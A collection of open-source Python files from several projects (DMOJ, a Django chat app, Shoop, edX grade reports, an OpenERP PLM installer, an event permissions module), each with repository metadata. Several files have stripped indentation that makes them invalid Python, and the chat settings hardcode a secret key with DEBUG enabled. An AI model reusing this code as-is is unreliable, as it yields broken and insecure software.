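# assuming the registry decorator returns the class unchanged:
if __name__ == '__main__':
    _fmt = ICPCContestFormat.__new__(ICPCContestFormat)  # skip __init__ for the demo
    assert [_fmt.get_label_for_problem(i) for i in (0, 1, 25, 26, 27)] == ['A', 'B', 'Z', 'AA', 'AB']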
|
DMOJ/site
|
judge/contest_format/icpc.py
|
Python
|
agpl-3.0
| 5,572
|
"""
Django settings for chat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from django.conf import global_settings
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-ppj_f9b+@amiqrleaea&dh&ho=kp#uxi#w77t!boiix1dp$@a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'allauth',
'allauth.account',
'allauth.socialaccount',
'rest_framework',
'swampdragon',
'swampdragon_auth',
'swampdragon_notifications',
'chatroom',
'django_extensions',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django.core.context_processors.request',
'allauth.account.context_processors.account',
'allauth.socialaccount.context_processors.socialaccount',
)
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
SITE_ID = 1
ROOT_URLCONF = 'chat.urls'
WSGI_APPLICATION = 'chat.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'HOST': 'db',
'PORT': 5432,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
DRAGON_URL = 'http://localhost:9999/'
SWAMP_DRAGON_REDIS_HOST = 'redis'
ACCOUNT_AUTHENTICATION_METHOD = "email"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
# SwampDragon settings
SWAMP_DRAGON_CONNECTION = ('chatroom.connection.notification_connection.ChatConnection', '/data')
#SWAMP_DRAGON_CONNECTION = ('swampdragon_notifications.notification_connection.Connection', '/data')
SWAMP_DRAGON_HEARTBEAT_ENABLED = True
SWAMP_DRAGON_HEARTBEAT_FREQUENCY = 1000 * 60 * 5 # Five minutes
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',),
}
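# Development convenience (editor's note): the guard below unconditionally
# routes outgoing mail to the console backend; swap the literal for a real
# setting such as DEBUG before pointing this at an SMTP server.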
if True:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
bufke/chat-experiment
|
chat/settings.py
|
Python
|
agpl-3.0
| 3,651
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shoop.admin.base import AdminModule, MenuEntry
from shoop.admin.utils.urls import derive_model_url, get_edit_and_list_urls
from shoop.core.models import Manufacturer
class ManufacturerModule(AdminModule):
name = _("Manufacturers")
breadcrumbs_menu_entry = MenuEntry(name, url="shoop_admin:manufacturers.list")
def get_urls(self):
return get_edit_and_list_urls(
url_prefix="^Manufacturers",
view_template="shoop.admin.modules.manufacturers.views.Manufacturer%sView",
name_template="manufacturers.%s"
)
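    # Editor's note (inferred from the helper's name, not verified): the %s
    # placeholders above are presumably expanded into edit/list view classes
    # and URL names, e.g. ManufacturerEditView and "manufacturers.list".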
def get_menu_entries(self, request):
category = _("Products")
return [
MenuEntry(
text=_("Manufacturers"),
icon="fa fa-building",
url="shoop_admin:manufacturers.list",
category=category
),
]
def get_model_url(self, object, kind):
return derive_model_url(Manufacturer, "shoop_admin:manufacturers", object, kind)
|
akx/shoop
|
shoop/admin/modules/manufacturers/__init__.py
|
Python
|
agpl-3.0
| 1,356
|
"""
Functionality for generating grade reports.
"""
from __future__ import absolute_import
import logging
import re
from collections import OrderedDict, defaultdict
from datetime import datetime
from itertools import chain
from time import time
import six
from django.conf import settings
from django.contrib.auth import get_user_model
from lazy import lazy
from opaque_keys.edx.keys import UsageKey
from pytz import UTC
from six import text_type
from six.moves import zip, zip_longest
from course_blocks.api import get_course_blocks
from courseware.courses import get_course_by_id
from courseware.user_state_client import DjangoXBlockUserStateClient
from instructor_analytics.basic import list_problem_responses
from instructor_analytics.csvs import format_dictlist
from lms.djangoapps.certificates.models import CertificateWhitelist, GeneratedCertificate, certificate_info_for_user
from lms.djangoapps.grades.api import CourseGradeFactory
from lms.djangoapps.grades.api import context as grades_context
from lms.djangoapps.grades.api import prefetch_course_and_subsection_grades
from lms.djangoapps.teams.models import CourseTeamMembership
from lms.djangoapps.verify_student.services import IDVerificationService
from openedx.core.djangoapps.content.block_structure.api import get_course_in_cache
from openedx.core.djangoapps.course_groups.cohorts import bulk_cache_cohorts, get_cohort, is_course_cohorted
from openedx.core.djangoapps.user_api.course_tag.api import BulkCourseTags
from openedx.core.djangoapps.waffle_utils import WaffleSwitchNamespace
from student.models import CourseEnrollment
from student.roles import BulkRoleCache
from xmodule.modulestore.django import modulestore
from xmodule.partitions.partitions_service import PartitionService
from xmodule.split_test_module import get_split_user_partitions
from .runner import TaskProgress
from .utils import upload_csv_to_report_store
WAFFLE_NAMESPACE = 'instructor_task'
WAFFLE_SWITCHES = WaffleSwitchNamespace(name=WAFFLE_NAMESPACE)
OPTIMIZE_GET_LEARNERS_FOR_COURSE = 'optimize_get_learners_for_course'
TASK_LOG = logging.getLogger('edx.celery.task')
ENROLLED_IN_COURSE = 'enrolled'
NOT_ENROLLED_IN_COURSE = 'unenrolled'
def _user_enrollment_status(user, course_id):
"""
Returns the enrollment activation status in the given course
for the given user.
"""
enrollment_is_active = CourseEnrollment.enrollment_mode_for_user(user, course_id)[1]
if enrollment_is_active:
return ENROLLED_IN_COURSE
return NOT_ENROLLED_IN_COURSE
def _flatten(iterable):
return list(chain.from_iterable(iterable))
class _CourseGradeReportContext(object):
"""
Internal class that provides a common context to use for a single grade
report. When a report is parallelized across multiple processes,
elements of this context are serialized and parsed across process
boundaries.
"""
def __init__(self, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
self.task_info_string = (
u'Task: {task_id}, '
u'InstructorTask ID: {entry_id}, '
u'Course: {course_id}, '
u'Input: {task_input}'
).format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input,
)
self.action_name = action_name
self.course_id = course_id
self.task_progress = TaskProgress(self.action_name, total=None, start_time=time())
@lazy
def course(self):
return get_course_by_id(self.course_id)
@lazy
def course_structure(self):
return get_course_in_cache(self.course_id)
@lazy
def course_experiments(self):
return get_split_user_partitions(self.course.user_partitions)
@lazy
def teams_enabled(self):
return self.course.teams_enabled
@lazy
def cohorts_enabled(self):
return is_course_cohorted(self.course_id)
@lazy
def graded_assignments(self):
"""
Returns an OrderedDict that maps an assignment type to a dict of
subsection-headers and average-header.
"""
grading_cxt = grades_context.grading_context(self.course, self.course_structure)
graded_assignments_map = OrderedDict()
for assignment_type_name, subsection_infos in six.iteritems(grading_cxt['all_graded_subsections_by_type']):
graded_subsections_map = OrderedDict()
for subsection_index, subsection_info in enumerate(subsection_infos, start=1):
subsection = subsection_info['subsection_block']
header_name = u"{assignment_type} {subsection_index}: {subsection_name}".format(
assignment_type=assignment_type_name,
subsection_index=subsection_index,
subsection_name=subsection.display_name,
)
graded_subsections_map[subsection.location] = header_name
average_header = u"{assignment_type}".format(assignment_type=assignment_type_name)
# Use separate subsection and average columns only if
# there's more than one subsection.
separate_subsection_avg_headers = len(subsection_infos) > 1
if separate_subsection_avg_headers:
average_header += u" (Avg)"
graded_assignments_map[assignment_type_name] = {
'subsection_headers': graded_subsections_map,
'average_header': average_header,
'separate_subsection_avg_headers': separate_subsection_avg_headers,
'grader': grading_cxt['subsection_type_graders'].get(assignment_type_name),
}
return graded_assignments_map
def update_status(self, message):
"""
Updates the status on the celery task to the given message.
Also logs the update.
"""
TASK_LOG.info(u'%s, Task type: %s, %s', self.task_info_string, self.action_name, message)
return self.task_progress.update_task_state(extra_meta={'step': message})
class _CertificateBulkContext(object):
def __init__(self, context, users):
certificate_whitelist = CertificateWhitelist.objects.filter(course_id=context.course_id, whitelist=True)
self.whitelisted_user_ids = [entry.user_id for entry in certificate_whitelist]
self.certificates_by_user = {
certificate.user.id: certificate
for certificate in
GeneratedCertificate.objects.filter(course_id=context.course_id, user__in=users)
}
class _TeamBulkContext(object):
def __init__(self, context, users):
self.enabled = context.teams_enabled
if self.enabled:
self.teams_by_user = {
membership.user.id: membership.team.name
for membership in
CourseTeamMembership.objects.filter(team__course_id=context.course_id, user__in=users)
}
else:
self.teams_by_user = {}
class _EnrollmentBulkContext(object):
def __init__(self, context, users):
CourseEnrollment.bulk_fetch_enrollment_states(users, context.course_id)
self.verified_users = set(IDVerificationService.get_verified_user_ids(users))
class _CourseGradeBulkContext(object):
def __init__(self, context, users):
self.certs = _CertificateBulkContext(context, users)
self.teams = _TeamBulkContext(context, users)
self.enrollments = _EnrollmentBulkContext(context, users)
bulk_cache_cohorts(context.course_id, users)
BulkRoleCache.prefetch(users)
prefetch_course_and_subsection_grades(context.course_id, users)
BulkCourseTags.prefetch(context.course_id, users)
class CourseGradeReport(object):
"""
Class to encapsulate functionality related to generating Grade Reports.
"""
# Batch size for chunking the list of enrollees in the course.
USER_BATCH_SIZE = 100
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Public method to generate a grade report.
"""
with modulestore().bulk_operations(course_id):
context = _CourseGradeReportContext(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name)
return CourseGradeReport()._generate(context)
def _generate(self, context):
"""
Internal method for generating a grade report for the given context.
"""
context.update_status(u'Starting grades')
success_headers = self._success_headers(context)
error_headers = self._error_headers()
batched_rows = self._batched_rows(context)
context.update_status(u'Compiling grades')
success_rows, error_rows = self._compile(context, batched_rows)
context.update_status(u'Uploading grades')
self._upload(context, success_headers, success_rows, error_headers, error_rows)
return context.update_status(u'Completed grades')
def _success_headers(self, context):
"""
Returns a list of all applicable column headers for this grade report.
"""
return (
["Student ID", "Email", "Username"] +
self._grades_header(context) +
(['Cohort Name'] if context.cohorts_enabled else []) +
[u'Experiment Group ({})'.format(partition.name) for partition in context.course_experiments] +
(['Team Name'] if context.teams_enabled else []) +
['Enrollment Track', 'Verification Status'] +
['Certificate Eligible', 'Certificate Delivered', 'Certificate Type'] +
['Enrollment Status']
)
def _error_headers(self):
"""
Returns a list of error headers for this grade report.
"""
return ["Student ID", "Username", "Error"]
def _batched_rows(self, context):
"""
A generator of batches of (success_rows, error_rows) for this report.
"""
for users in self._batch_users(context):
users = [u for u in users if u is not None]
yield self._rows_for_users(context, users)
def _compile(self, context, batched_rows):
"""
Compiles and returns the complete list of (success_rows, error_rows) for
the given batched_rows and context.
"""
# partition and chain successes and errors
success_rows, error_rows = zip(*batched_rows)
success_rows = list(chain(*success_rows))
error_rows = list(chain(*error_rows))
# update metrics on task status
context.task_progress.succeeded = len(success_rows)
context.task_progress.failed = len(error_rows)
context.task_progress.attempted = context.task_progress.succeeded + context.task_progress.failed
context.task_progress.total = context.task_progress.attempted
return success_rows, error_rows
def _upload(self, context, success_headers, success_rows, error_headers, error_rows):
"""
Creates and uploads a CSV for the given headers and rows.
"""
date = datetime.now(UTC)
upload_csv_to_report_store([success_headers] + success_rows, 'grade_report', context.course_id, date)
if len(error_rows) > 0:
error_rows = [error_headers] + error_rows
upload_csv_to_report_store(error_rows, 'grade_report_err', context.course_id, date)
def _grades_header(self, context):
"""
Returns the applicable grades-related headers for this report.
"""
graded_assignments = context.graded_assignments
grades_header = ["Grade"]
for assignment_info in six.itervalues(graded_assignments):
if assignment_info['separate_subsection_avg_headers']:
grades_header.extend(six.itervalues(assignment_info['subsection_headers']))
grades_header.append(assignment_info['average_header'])
return grades_header
def _batch_users(self, context):
"""
Returns a generator of batches of users.
"""
def grouper(iterable, chunk_size=self.USER_BATCH_SIZE, fillvalue=None):
args = [iter(iterable)] * chunk_size
return zip_longest(*args, fillvalue=fillvalue)
def users_for_course(course_id):
"""
Get all the enrolled users in a course.
This method fetches & loads the enrolled user objects at once which may cause
out-of-memory errors in large courses. This method will be removed when
`OPTIMIZE_GET_LEARNERS_FOR_COURSE` waffle flag is removed.
"""
users = CourseEnrollment.objects.users_enrolled_in(course_id, include_inactive=True)
users = users.select_related('profile')
return grouper(users)
def users_for_course_v2(course_id):
"""
Get all the enrolled users in a course chunk by chunk.
This generator method fetches & loads the enrolled user objects on demand which in chunk
size defined. This method is a workaround to avoid out-of-memory errors.
"""
filter_kwargs = {
'courseenrollment__course_id': course_id,
}
user_ids_list = get_user_model().objects.filter(**filter_kwargs).values_list('id', flat=True).order_by('id')
user_chunks = grouper(user_ids_list)
for user_ids in user_chunks:
user_ids = [user_id for user_id in user_ids if user_id is not None]
min_id = min(user_ids)
max_id = max(user_ids)
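                # Because user_ids_list is ordered by id and chunked
                # consecutively, every enrolled user id in [min_id, max_id]
                # belongs to this chunk, so the cheap range filter below is
                # equivalent to an id__in lookup.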
users = get_user_model().objects.filter(
id__gte=min_id,
id__lte=max_id,
**filter_kwargs
).select_related('profile')
yield users
task_log_message = u'{}, Task type: {}'.format(context.task_info_string, context.action_name)
if WAFFLE_SWITCHES.is_enabled(OPTIMIZE_GET_LEARNERS_FOR_COURSE):
TASK_LOG.info(u'%s, Creating Course Grade with optimization', task_log_message)
return users_for_course_v2(context.course_id)
TASK_LOG.info(u'%s, Creating Course Grade without optimization', task_log_message)
batch_users = users_for_course(context.course_id)
return batch_users
def _user_grades(self, course_grade, context):
"""
Returns a list of grade results for the given course_grade corresponding
to the headers for this report.
"""
grade_results = []
for _, assignment_info in six.iteritems(context.graded_assignments):
subsection_grades, subsection_grades_results = self._user_subsection_grades(
course_grade,
assignment_info['subsection_headers'],
)
grade_results.extend(subsection_grades_results)
assignment_average = self._user_assignment_average(course_grade, subsection_grades, assignment_info)
if assignment_average is not None:
grade_results.append([assignment_average])
return [course_grade.percent] + _flatten(grade_results)
def _user_subsection_grades(self, course_grade, subsection_headers):
"""
        Returns a tuple of (subsection grades, per-subsection grade results)
        for the given course_grade and subsection headers.
"""
subsection_grades = []
grade_results = []
for subsection_location in subsection_headers:
subsection_grade = course_grade.subsection_grade(subsection_location)
if subsection_grade.attempted_graded:
grade_result = subsection_grade.percent_graded
else:
grade_result = u'Not Attempted'
grade_results.append([grade_result])
subsection_grades.append(subsection_grade)
return subsection_grades, grade_results
def _user_assignment_average(self, course_grade, subsection_grades, assignment_info):
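        # Only assignment types with more than one graded subsection get an
        # average column; when separate headers are disabled this implicitly
        # returns None and _user_grades() appends nothing. A grader is assumed
        # to be present whenever separate headers are enabled.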
if assignment_info['separate_subsection_avg_headers']:
if assignment_info['grader']:
if course_grade.attempted:
subsection_breakdown = [
{'percent': subsection_grade.percent_graded}
for subsection_grade in subsection_grades
]
assignment_average, _ = assignment_info['grader'].total_with_drops(subsection_breakdown)
else:
assignment_average = 0.0
return assignment_average
def _user_cohort_group_names(self, user, context):
"""
Returns a list of names of cohort groups in which the given user
belongs.
"""
cohort_group_names = []
if context.cohorts_enabled:
group = get_cohort(user, context.course_id, assign=False, use_cached=True)
cohort_group_names.append(group.name if group else '')
return cohort_group_names
def _user_experiment_group_names(self, user, context):
"""
Returns a list of names of course experiments in which the given user
belongs.
"""
experiment_group_names = []
for partition in context.course_experiments:
group = PartitionService(context.course_id).get_group(user, partition, assign=False)
experiment_group_names.append(group.name if group else '')
return experiment_group_names
def _user_team_names(self, user, bulk_teams):
"""
Returns a list of names of teams in which the given user belongs.
"""
team_names = []
if bulk_teams.enabled:
team_names = [bulk_teams.teams_by_user.get(user.id, '')]
return team_names
def _user_verification_mode(self, user, context, bulk_enrollments):
"""
Returns a list of enrollment-mode and verification-status for the
given user.
"""
enrollment_mode = CourseEnrollment.enrollment_mode_for_user(user, context.course_id)[0]
verification_status = IDVerificationService.verification_status_for_user(
user,
enrollment_mode,
user_is_verified=user.id in bulk_enrollments.verified_users,
)
return [enrollment_mode, verification_status]
def _user_certificate_info(self, user, context, course_grade, bulk_certs):
"""
Returns the course certification information for the given user.
"""
is_whitelisted = user.id in bulk_certs.whitelisted_user_ids
certificate_info = certificate_info_for_user(
user,
context.course_id,
course_grade.letter_grade,
is_whitelisted,
bulk_certs.certificates_by_user.get(user.id),
)
TASK_LOG.info(
u'Student certificate eligibility: %s '
u'(user=%s, course_id=%s, grade_percent=%s letter_grade=%s gradecutoffs=%s, allow_certificate=%s, '
u'is_whitelisted=%s)',
certificate_info[0],
user,
context.course_id,
course_grade.percent,
course_grade.letter_grade,
context.course.grade_cutoffs,
user.profile.allow_certificate,
is_whitelisted,
)
return certificate_info
def _rows_for_users(self, context, users):
"""
Returns a list of rows for the given users for this report.
"""
with modulestore().bulk_operations(context.course_id):
bulk_context = _CourseGradeBulkContext(context, users)
success_rows, error_rows = [], []
for user, course_grade, error in CourseGradeFactory().iter(
users,
course=context.course,
collected_block_structure=context.course_structure,
course_key=context.course_id,
):
if not course_grade:
# An empty gradeset means we failed to grade a student.
error_rows.append([user.id, user.username, text_type(error)])
else:
success_rows.append(
[user.id, user.email, user.username] +
self._user_grades(course_grade, context) +
self._user_cohort_group_names(user, context) +
self._user_experiment_group_names(user, context) +
self._user_team_names(user, bulk_context.teams) +
self._user_verification_mode(user, context, bulk_context.enrollments) +
self._user_certificate_info(user, context, course_grade, bulk_context.certs) +
[_user_enrollment_status(user, context.course_id)]
)
return success_rows, error_rows
class ProblemGradeReport(object):
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, _task_input, action_name):
"""
Generate a CSV containing all students' problem grades within a given
`course_id`.
"""
start_time = time()
start_date = datetime.now(UTC)
status_interval = 100
enrolled_students = CourseEnrollment.objects.users_enrolled_in(course_id, include_inactive=True)
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
        # This OrderedDict keeps the Django User field names (keys) paired with
        # the display names used for the static columns of the header row
        # (values), so the two stay in sync.
header_row = OrderedDict([('id', 'Student ID'), ('email', 'Email'), ('username', 'Username')])
course = get_course_by_id(course_id)
graded_scorable_blocks = cls._graded_scorable_blocks_to_header(course)
# Just generate the static fields for now.
rows = [
list(header_row.values()) + ['Enrollment Status', 'Grade'] + _flatten(list(graded_scorable_blocks.values()))
]
error_rows = [list(header_row.values()) + ['error_msg']]
current_step = {'step': 'Calculating Grades'}
# Bulk fetch and cache enrollment states so we can efficiently determine
# whether each user is currently enrolled in the course.
CourseEnrollment.bulk_fetch_enrollment_states(enrolled_students, course_id)
for student, course_grade, error in CourseGradeFactory().iter(enrolled_students, course):
student_fields = [getattr(student, field_name) for field_name in header_row]
task_progress.attempted += 1
if not course_grade:
err_msg = text_type(error)
# There was an error grading this student.
if not err_msg:
err_msg = u'Unknown error'
error_rows.append(student_fields + [err_msg])
task_progress.failed += 1
continue
enrollment_status = _user_enrollment_status(student, course_id)
earned_possible_values = []
for block_location in graded_scorable_blocks:
try:
problem_score = course_grade.problem_scores[block_location]
except KeyError:
earned_possible_values.append([u'Not Available', u'Not Available'])
else:
if problem_score.first_attempted:
earned_possible_values.append([problem_score.earned, problem_score.possible])
else:
earned_possible_values.append([u'Not Attempted', problem_score.possible])
rows.append(student_fields + [enrollment_status, course_grade.percent] + _flatten(earned_possible_values))
task_progress.succeeded += 1
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload if any students have been successfully graded
if len(rows) > 1:
upload_csv_to_report_store(rows, 'problem_grade_report', course_id, start_date)
# If there are any error rows, write them out as well
if len(error_rows) > 1:
upload_csv_to_report_store(error_rows, 'problem_grade_report_err', course_id, start_date)
return task_progress.update_task_state(extra_meta={'step': 'Uploading CSV'})
@classmethod
def _graded_scorable_blocks_to_header(cls, course):
"""
Returns an OrderedDict that maps a scorable block's id to its
headers in the final report.
"""
scorable_blocks_map = OrderedDict()
grading_context = grades_context.grading_context_for_course(course)
for assignment_type_name, subsection_infos in six.iteritems(grading_context['all_graded_subsections_by_type']):
for subsection_index, subsection_info in enumerate(subsection_infos, start=1):
for scorable_block in subsection_info['scored_descendants']:
header_name = (
u"{assignment_type} {subsection_index}: "
u"{subsection_name} - {scorable_block_name}"
).format(
scorable_block_name=scorable_block.display_name,
assignment_type=assignment_type_name,
subsection_index=subsection_index,
subsection_name=subsection_info['subsection_block'].display_name,
)
scorable_blocks_map[scorable_block.location] = [header_name + " (Earned)",
header_name + " (Possible)"]
return scorable_blocks_map
class ProblemResponses(object):
@classmethod
def _build_problem_list(cls, course_blocks, root, path=None):
"""
Generate a tuple of display names, block location paths and block keys
for all problem blocks under the ``root`` block.
Arguments:
course_blocks (BlockStructureBlockData): Block structure for a course.
root (UsageKey): This block and its children will be used to generate
the problem list
path (List[str]): The list of display names for the parent of root block
Yields:
Tuple[str, List[str], UsageKey]: tuple of a block's display name, path, and
usage key
"""
name = course_blocks.get_xblock_field(root, 'display_name') or root.category
if path is None:
path = [name]
yield name, path, root
for block in course_blocks.get_children(root):
name = course_blocks.get_xblock_field(block, 'display_name') or block.category
for result in cls._build_problem_list(course_blocks, block, path + [name]):
yield result
@classmethod
def _build_student_data(cls, user_id, course_key, usage_key_str):
"""
Generate a list of problem responses for all problem under the
``problem_location`` root.
Arguments:
user_id (int): The user id for the user generating the report
course_key (CourseKey): The ``CourseKey`` for the course whose report
is being generated
usage_key_str (str): The generated report will include this
                block and its child blocks.
Returns:
Tuple[List[Dict], List[str]]: Returns a list of dictionaries
containing the student data which will be included in the
final csv, and the features/keys to include in that CSV.
"""
usage_key = UsageKey.from_string(usage_key_str).map_into_course(course_key)
user = get_user_model().objects.get(pk=user_id)
course_blocks = get_course_blocks(user, usage_key)
student_data = []
max_count = settings.FEATURES.get('MAX_PROBLEM_RESPONSES_COUNT')
store = modulestore()
user_state_client = DjangoXBlockUserStateClient()
student_data_keys = set()
with store.bulk_operations(course_key):
for title, path, block_key in cls._build_problem_list(course_blocks, usage_key):
# Chapter and sequential blocks are filtered out since they include state
# which isn't useful for this report.
if block_key.block_type in ('sequential', 'chapter'):
continue
block = store.get_item(block_key)
generated_report_data = defaultdict(list)
# Blocks can implement the generate_report_data method to provide their own
# human-readable formatting for user state.
if hasattr(block, 'generate_report_data'):
try:
user_state_iterator = user_state_client.iter_all_for_block(block_key)
for username, state in block.generate_report_data(user_state_iterator, max_count):
generated_report_data[username].append(state)
except NotImplementedError:
pass
responses = []
for response in list_problem_responses(course_key, block_key, max_count):
response['title'] = title
# A human-readable location for the current block
response['location'] = ' > '.join(path)
# A machine-friendly location for the current block
response['block_key'] = str(block_key)
# A block that has a single state per user can contain multiple responses
# within the same state.
user_states = generated_report_data.get(response['username'], [])
if user_states:
# For each response in the block, copy over the basic data like the
# title, location, block_key and state, and add in the responses
for user_state in user_states:
user_response = response.copy()
user_response.update(user_state)
student_data_keys = student_data_keys.union(list(user_state.keys()))
responses.append(user_response)
else:
responses.append(response)
student_data += responses
if max_count is not None:
max_count -= len(responses)
if max_count <= 0:
break
# Keep the keys in a useful order, starting with username, title and location,
# then the columns returned by the xblock report generator in sorted order and
# finally end with the more machine friendly block_key and state.
student_data_keys_list = (
['username', 'title', 'location'] +
sorted(student_data_keys) +
['block_key', 'state']
)
return student_data, student_data_keys_list
@classmethod
def generate(cls, _xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
all student answers to a given problem, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating students answers to problem'}
task_progress.update_task_state(extra_meta=current_step)
problem_location = task_input.get('problem_location')
# Compute result table and format it
student_data, student_data_keys = cls._build_student_data(
user_id=task_input.get('user_id'),
course_key=course_id,
usage_key_str=problem_location
)
for data in student_data:
for key in student_data_keys:
data.setdefault(key, '')
header, rows = format_dictlist(student_data, student_data_keys)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
problem_location = re.sub(r'[:/]', '_', problem_location)
csv_name = 'student_state_from_{}'.format(problem_location)
report_name = upload_csv_to_report_store(rows, csv_name, course_id, start_date)
current_step = {'step': 'CSV uploaded', 'report_name': report_name}
return task_progress.update_task_state(extra_meta=current_step)
|
jolyonb/edx-platform
|
lms/djangoapps/instructor_task/tasks_helper/grades.py
|
Python
|
agpl-3.0
| 33,207
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import base64
import difflib
from openerp.osv import osv, fields
from openerp.tools.translate import config
import openerp.addons as addons
class plm_installer(osv.osv_memory):
_name='plm.installer'
_inherit='res.config.installer'
__logger = logging.getLogger(_name)
def default_get(self, cr, uid, fields, context=None):
data=super(plm_installer, self).default_get(cr, uid, fields, context)
data['exe_file']='http://sourceforge.net/projects/openerpplm/files/Client/OdooPlm(x64).exe/download'
return data
_columns={
'name':fields.char('File name', size=34),
'exe_name':fields.char('File name', size=128),
'plm':fields.boolean('Odoo PLM Plug-in', help="Product Life-Cycle Management Module."),
'exe_file':fields.char('Odoo PLM File download', size=128, readonly=True, help="Product Life-Cycle Management Client file. Save this file and install this application."),
'description':fields.text('Description', readonly=True)
}
_defaults={
'plm' : False,
'name' : 'OdooPlm.exe',
'description' : """
To complete your installation follow these notes :
* Configure Odoo access capabilty adding Users to the group 'PLM / Integration' before to use Clients.
* Download the Odoo PLM Client file.
* Follow these steps to install Product Life-Cycle Management Client.
1. Double click on Odoo PLM Client file.
2. Select language.
3. Select the directory where to install integrations.
4. Select the editor that has to be connected.
* At editor startup Odoo PLM menu and toolbar will be automatically loaded.
* At first time execution :
1. Click on Login button.
2. Insert data connection.
"""
}
plm_installer()
|
vnsofthe/odoo-dev
|
addons/plm/installer.py
|
Python
|
agpl-3.0
| 2,871
|
from .models import Event, EventAdminRoles, Job, Helper
# This is the central file that defines and manages the different permissions for events, jobs and users.
# Global permissions like creating events, users or sending newsletters are managed in the accounts app.
# There are different roles, defined in registration.models.EventAdminRoles
# In the views, a certain access is requested.
ACCESS_INVOLVED = "ACCESS_INVOLVED" # basically just the main page (user is somehow involved, necessary for all roles)
ACCESS_EVENT_EDIT = "ACCESS_EVENT_EDIT" # edit/archive/delete the event
ACCESS_EVENT_EDIT_LINKS = "ACCESS_EVENT_EDIT_LINKS" # edit links of an event
ACCESS_EVENT_EDIT_JOBS = "ACCESS_EVENT_EDIT_JOBS" # add/delete/duplicate/sort jobs
ACCESS_EVENT_EXPORT_HELPERS = "ACCESS_EVENT_EXPORT_HELPERS" # export data as pdf/excel
ACCESS_EVENT_EDIT_DUPLICATES = "ACCESS_EVENT_EDIT_DUPLICATES" # manage duplicated helpers
ACCESS_EVENT_VIEW_COORDINATORS = "ACCESS_EVENT_VIEW_COORDINATORS" # view the contact details of coordinators
ACCESS_EVENT_VIEW_AUDITLOGS = "ACCESS_EVENT_VIEW_AUDITLOGS" # view audit logs of the event
ACCESS_JOB_EDIT = "ACCESS_JOB_EDIT" # edit an existing job
ACCESS_JOB_EDIT_HELPERS = "ACCESS_JOB_EDIT_HELPERS" # add/remove helpers of job
ACCESS_JOB_VIEW_HELPERS = "ACCESS_JOB_VIEW_HELPERS" # view helpers of job
ACCESS_JOB_SEND_MAILS = "ACCESS_JOB_SEND_MAILS" # send mails for job
